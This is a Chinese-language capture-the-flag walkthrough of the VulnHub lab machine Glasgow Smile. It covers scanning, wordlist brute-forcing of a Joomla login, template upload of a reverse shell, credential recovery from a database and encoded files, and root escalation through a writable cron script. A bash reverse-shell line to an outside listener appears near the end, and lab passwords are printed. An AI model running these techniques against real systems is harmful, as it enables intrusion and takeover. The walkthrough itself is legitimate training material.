GLASGOW SMILE: 1.1

NoCirc1e發表於2024-05-05

靶機描述

靶機地址:https://download.vulnhub.com/glasgowsmile/GlasgowSmile-v1.1.zip

Description

Title: Glasgow Smile

  • Users: 5
  • Difficulty Level: Initial Shell (Easy) - Privileges Escalation (Intermediate)
  • Hint: Enumeration is the key.

If you are a newbie in Penetration Testing and afraid of OSCP preparation, do not worry. Glasgow Smile is supposed to be a kind of gym for OSCP machines.
The machine is designed to be as real-life as possible. Anyway, You will find also a bunch of ctf style challanges, it's important to have some encryption knowledge.
You need to have enough information about Linux enumeration and encryption for privileges escalation.

ABOUT THE VM:

Just download, extract and load the .vmx file in VMware Workstation (tested on VMware Workstation 15.x.x)
The adapter is currently NAT, networking is configured for DHCP and IP will get assigned automatically

CONTACT:

You can contact me on Hack the box (https://www.hackthebox.eu/profile/232477) or by email (mindsflee@hotmail.com) for hints!

Changelog 2020-06-16 - v1.1 2020-06-15 - v1.0

資訊收集

利用arp-scan -l命令掃描靶機IP

arp-scan -l

image.png
使用nmap掃描開放埠

nmap -sV -p- 192.168.75.172

image.png
訪問80埠並進行目錄爆破
image.png

dirsearch -u http://192.168.75.172/ 

image.png

密碼爆破

joomla/administrator是一個後臺登陸頁面
image.png

命令:cewl http://192.168.75.172/joomla -m 5 -d 1 -w joomla.txt
-w 寫入當前目錄的檔案中
-d 表示爬取深度,預設是2
-m 表示最小字元長度

image.png
生成字典後對joomla登入頁面進行爆破
image.png
image.png

漏洞利用

找到Extensions->Templates->Templates->Beez3 Details and Files上傳反彈shell
image.png
image.png

反彈shell

image.png
image.png
獲得互動式shell

python -c 'import pty; pty.spawn("/bin/bash")'

image.png
進入到/var/www發現有一個joomla2的目錄
image.png
檢視配置檔案發現資料庫的賬號和密碼
image.png

連線資料庫

image.png
image.png
image.png
rob為此虛擬機器的一個使用者,將rob的密碼進行base64解密
image.png
image.png

???AllIHaveAreNegativeThoughts???

rob連線ssh

使用rob的密碼進行ssh登入
image.png
發現一個加密檔案
image.png

  1. Abnerineedyourhelp檔名斷句分析,Abner I need your help像是一封求助信,開啟後看到經過了某種編碼加密,從一封信的角度來看,對內容做隱藏讓我想到ROT13
  2. Howtoberoot聽名字就知道,這應該是提升許可權的一個關鍵點,上面第一個檔案應該給到了提示

解密

線上解密工具:https://gchq.github.io/CyberChef/
image.png
image.png

abner:I33hope99my0death000makes44more8cents00than0my0life0

abner連線ssh

image.png
現在檢視一下三個賬戶剩下的最後一個賬戶penguin,查詢一下有關penguin的資訊

find / -iname *penguin* 2>/dev/null //找屬於penguin的檔案

image.png
切換到該目錄進行檢視
image.png
將該檔案移動到abner使用者的主目錄下進行解壓,否則沒有許可權

cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~
//~表示$HOME即使用者根目錄

檢視解壓出來的檔案,嘗試一下最後的密碼是不是penguins的密碼
image.png

scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

image.png

提權

利用檔案許可權配置不當進行提權
當某個程序啟動許可權為root,對應檔案編輯許可權為普通使用者時,我們可以利用該問題點進行提權
image.png

pspy64

https://github.com/DominicBreuker/pspy
image.png

chmod + pspy64
./pspy64

發現隱藏檔案.trash_ol一分鐘執行一次,前面發現這個.trash_old是可以編輯的,那就用他來反彈shell
image.png

bash -c 'bash -i >& /dev/tcp/192.168.75.150/7777 0>&1'

image.png
一分鐘後,計劃任務程式會自動執行.trash_old,最終獲取root許可權
image.png

相關文章